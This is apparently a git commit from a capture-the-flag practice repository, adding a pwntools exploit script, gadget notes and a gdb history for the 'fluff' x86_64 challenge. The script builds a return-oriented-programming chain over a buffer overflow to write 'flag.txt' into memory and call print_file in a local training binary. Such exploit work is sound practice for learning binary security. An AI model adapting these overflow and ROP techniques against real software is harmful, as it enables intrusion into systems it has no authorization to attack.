new file: x86_64/fluff/exploit.py
new file: x86_64/fluff/gadgets
This commit is contained in:
parent
3f54969f58
commit
4c25bd9188
Binary file not shown.
239
x86_64/fluff/.gdb_history
Normal file
239
x86_64/fluff/.gdb_history
Normal file
@ -0,0 +1,239 @@
|
||||
quit
|
||||
quit
|
||||
continue
|
||||
nexti
|
||||
nexti
|
||||
info reg rdi
|
||||
stepi
|
||||
nexti
|
||||
info reg rcx
|
||||
nexti
|
||||
info reg rbx
|
||||
stepi
|
||||
info reg rdx
|
||||
inro reg rbx
|
||||
info reg rbx
|
||||
quit
|
||||
stepi
|
||||
continue
|
||||
stepi
|
||||
x rbx
|
||||
info reg rbx
|
||||
quit
|
||||
conitnue
|
||||
continue
|
||||
stepi
|
||||
info reg rbx
|
||||
info reg rcx
|
||||
quit
|
||||
continue
|
||||
stepi
|
||||
info reg rbx
|
||||
info reg rdx
|
||||
quit
|
||||
continue
|
||||
stepi
|
||||
info reg rbx
|
||||
quit
|
||||
continue
|
||||
stepi
|
||||
info reg rbx
|
||||
quit
|
||||
continue
|
||||
stepi
|
||||
info reg rbx
|
||||
quit
|
||||
continue
|
||||
stepi
|
||||
stepi
|
||||
info reg rcx
|
||||
stepi
|
||||
info reg rbx
|
||||
info reg rdx
|
||||
quit
|
||||
continue
|
||||
stepi
|
||||
info reg rbx
|
||||
stepi
|
||||
info reg rbx
|
||||
quit
|
||||
stepi
|
||||
continue
|
||||
stepi
|
||||
info reg rbx
|
||||
stepi
|
||||
info reg rbx
|
||||
quit
|
||||
quit
|
||||
continue
|
||||
stepi
|
||||
info reg rbx
|
||||
quit
|
||||
stepi
|
||||
continue
|
||||
stepi
|
||||
info reg rbx
|
||||
stepi
|
||||
info reg rbx
|
||||
quit
|
||||
continue
|
||||
stepi
|
||||
info reg rbx
|
||||
stepi
|
||||
info reg rdx
|
||||
quit
|
||||
continue
|
||||
stepi
|
||||
info reg rbx
|
||||
quit
|
||||
continue
|
||||
stepi
|
||||
quit
|
||||
continue
|
||||
stepi
|
||||
info reg rbx
|
||||
quit
|
||||
quit
|
||||
continue
|
||||
stepi
|
||||
stepi
|
||||
info reg rbp
|
||||
stepi
|
||||
info reg rax
|
||||
stepi
|
||||
info reg rax
|
||||
stepi
|
||||
info reg rdi
|
||||
x/s 0x601be0
|
||||
stepi
|
||||
x/s 0x601be0
|
||||
stepi
|
||||
x/s 0x601be0
|
||||
stepi
|
||||
x/s 0x601be0
|
||||
stepi
|
||||
x/s 0x601be0
|
||||
stepi
|
||||
x/s 0x601be0
|
||||
q
|
||||
continue
|
||||
stepi
|
||||
x/s 0x601be0
|
||||
stepi
|
||||
x/s 0x601be0
|
||||
stepi
|
||||
x/s 0x601be0
|
||||
stepi
|
||||
quit
|
||||
conitnue
|
||||
continue
|
||||
continue
|
||||
stepi
|
||||
quit
|
||||
x 0x0000000000400000
|
||||
x/c 0x0000000000400000
|
||||
x/c 0x00000000004003c4
|
||||
x/c 0x0000000000400000
|
||||
quit
|
||||
continue
|
||||
stepi
|
||||
x/s 0x601be0
|
||||
x/c 0x0000000000400251
|
||||
stepi
|
||||
stepi
|
||||
x/s flag.txt
|
||||
x/s 0x601be0
|
||||
quit
|
||||
watch *0x601be0 + 7
|
||||
continue
|
||||
x/s 0x601be0
|
||||
continue
|
||||
x/s 0x601be0
|
||||
x/s 0x601be1
|
||||
x/s 0x601be0
|
||||
x/s 0x601be7
|
||||
continue
|
||||
x/s 0x601be7
|
||||
x/s 0x601be0
|
||||
continue
|
||||
quit
|
||||
watch *0x601be4
|
||||
continue
|
||||
x/s 0x601be0
|
||||
continue
|
||||
x/s 0x601be0
|
||||
continue
|
||||
x/s 0x601be0
|
||||
stepi
|
||||
stepi
|
||||
x/s $rdi
|
||||
x/s 0x601be0
|
||||
quit
|
||||
continue
|
||||
x/s 0x601be0
|
||||
quit
|
||||
break *0x00000000004006a3
|
||||
continue
|
||||
context
|
||||
stepi
|
||||
x/s $rdi
|
||||
stepi
|
||||
quit
|
||||
break *0x00000000004006a3
|
||||
continue
|
||||
context
|
||||
c/s 0x7ffdf0faba10 - 8
|
||||
x/s 0x7ffdf0faba10 - 8
|
||||
x/s 0x7ffdf0faba10 - 4
|
||||
x/s 0x7ffdf0faba10 - 16
|
||||
x/x 0x7ffdf0faba10 - 8
|
||||
x/x 0x7ffdf0faba10
|
||||
x/x 0x7ffdf0faba10 = 4
|
||||
x/x 0x7ffdf0faba10 - 4
|
||||
x/x 0x7ffdf0faba10 + 4
|
||||
context
|
||||
info reg rdi
|
||||
info reg rip
|
||||
search
|
||||
search 0x601be0
|
||||
search --qword 0x601be0
|
||||
search --qword 0x601be0 --writable
|
||||
search --qword 0x0000000000400510 --writable
|
||||
context
|
||||
continue
|
||||
stepi
|
||||
continue
|
||||
stepi
|
||||
quit
|
||||
break *0x00000000004006a3
|
||||
continue
|
||||
stepi
|
||||
continue
|
||||
x/i 0x400639
|
||||
x/10i 0x400639
|
||||
quit
|
||||
break *0x400639
|
||||
conitnue
|
||||
continue
|
||||
x/s 0x601be0
|
||||
continue
|
||||
x/s 0x601be0
|
||||
continue
|
||||
x/s 0x601be0
|
||||
stepi
|
||||
quit
|
||||
break *0x400639
|
||||
continue
|
||||
continue
|
||||
x/s 0x601be0
|
||||
continue
|
||||
x/s 0x601be0
|
||||
continue
|
||||
x/s 0x601be0
|
||||
stepi
|
||||
stepi
|
||||
x/s 0x601be0
|
||||
x/x 0x601be0 + 8
|
||||
x/x 0x601be0 + 9
|
||||
x/x 0x601be0 + 10
|
||||
quit
|
BIN
x86_64/fluff/core
Normal file
BIN
x86_64/fluff/core
Normal file
Binary file not shown.
49
x86_64/fluff/exploit.py
Executable file
49
x86_64/fluff/exploit.py
Executable file
@ -0,0 +1,49 @@
|
||||
#!/usr/bin/env python3
|
||||
from pwn import *
|
||||
|
||||
letter_lookups = {
|
||||
'f' : 0x00000000004003c4,
|
||||
'l' : 0x0000000000400239,
|
||||
'a' : 0x00000000004003d6,
|
||||
'g' : 0x00000000004003cf,
|
||||
'.' : 0x0000000000400251,
|
||||
't' : 0x0000000000400192,
|
||||
'x' : 0x0000000000400246}
|
||||
|
||||
def write_str(dest, string, payload):
|
||||
payload += p64(0x00000000004006a3)
|
||||
payload += p64(dest)
|
||||
for c in string:
|
||||
payload += p64(0x40062a)
|
||||
payload += p64(0x4000) # if things go wrong, check endian/order
|
||||
payload += p64(letter_lookups[c] - 0x3ef2)
|
||||
|
||||
payload += p64(0x0000000000400610)
|
||||
payload += p64(0)
|
||||
|
||||
payload += p64(0x400628)
|
||||
|
||||
payload += p64(0x400639)
|
||||
|
||||
return(payload)
|
||||
|
||||
|
||||
prog = gdb.debug('./fluff', gdbscript='''
|
||||
break *pwnme + 151
|
||||
'''
|
||||
)
|
||||
payload = b''
|
||||
for c in range(40):
|
||||
payload += b'a'
|
||||
|
||||
payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)
|
||||
payload += p64(0x00000000004006a3)
|
||||
payload += p64(0x601be0) # set rdi
|
||||
|
||||
payload += p64(0x0000000000400510)
|
||||
|
||||
payload += b"\n"
|
||||
prog.sendline(payload)
|
||||
sleep(1)
|
||||
print(str(prog.recv(), 'UTF-8'))
|
||||
prog.interactive()
|
44
x86_64/fluff/gadgets
Normal file
44
x86_64/fluff/gadgets
Normal file
@ -0,0 +1,44 @@
|
||||
Memory bytes information
|
||||
=======================================================
|
||||
0x00000000004003c4 : 'f'
|
||||
0x0000000000400239 : 'l'
|
||||
0x00000000004003d6 : 'a'
|
||||
0x00000000004003cf : 'g'
|
||||
0x0000000000400000 : '.'
|
||||
0x0000000000400192 : 't'
|
||||
0x0000000000400246 : 'x'
|
||||
0x0000000000400192 : 't'
|
||||
|
||||
0x0000000000400610 : mov eax, 0 ; pop rbp ; ret
|
||||
|
||||
400628: d7 xlat BYTE PTR ds:[rbx] #mov al, [rbx + al] requires rbx
|
||||
***
|
||||
40062a: 5a pop rdx
|
||||
40062b: 59 pop rcx
|
||||
40062c: 48 81 c1 f2 3e 00 00 add rcx,0x3ef2
|
||||
400633: c4 e2 e8 f7 d9 bextr rbx,rcx,rdx
|
||||
|
||||
#rdx is controller.
|
||||
rdx bits 0-7: starting bit
|
||||
rdx bits 8-15: length
|
||||
***
|
||||
400639: aa stos BYTE PTR es:[rdi],al #moves al to rdi, then adds rdi
|
||||
# requires rdi (check), al
|
||||
|
||||
|
||||
|
||||
0000000000400510 : print_file@plt
|
||||
|
||||
|
||||
0x00000000004006a3 : pop rdi ; ret
|
||||
|
||||
|
||||
exploit:
|
||||
|
||||
write to memory using al as letter
|
||||
set al to zero
|
||||
set rbx to memory location
|
||||
rcx: (location - 0x3ef2) before bextr
|
||||
rdx: 0x00 0x20 (from position zero, using 32 bits)
|
||||
|
||||
|
Loading…
x
Reference in New Issue
Block a user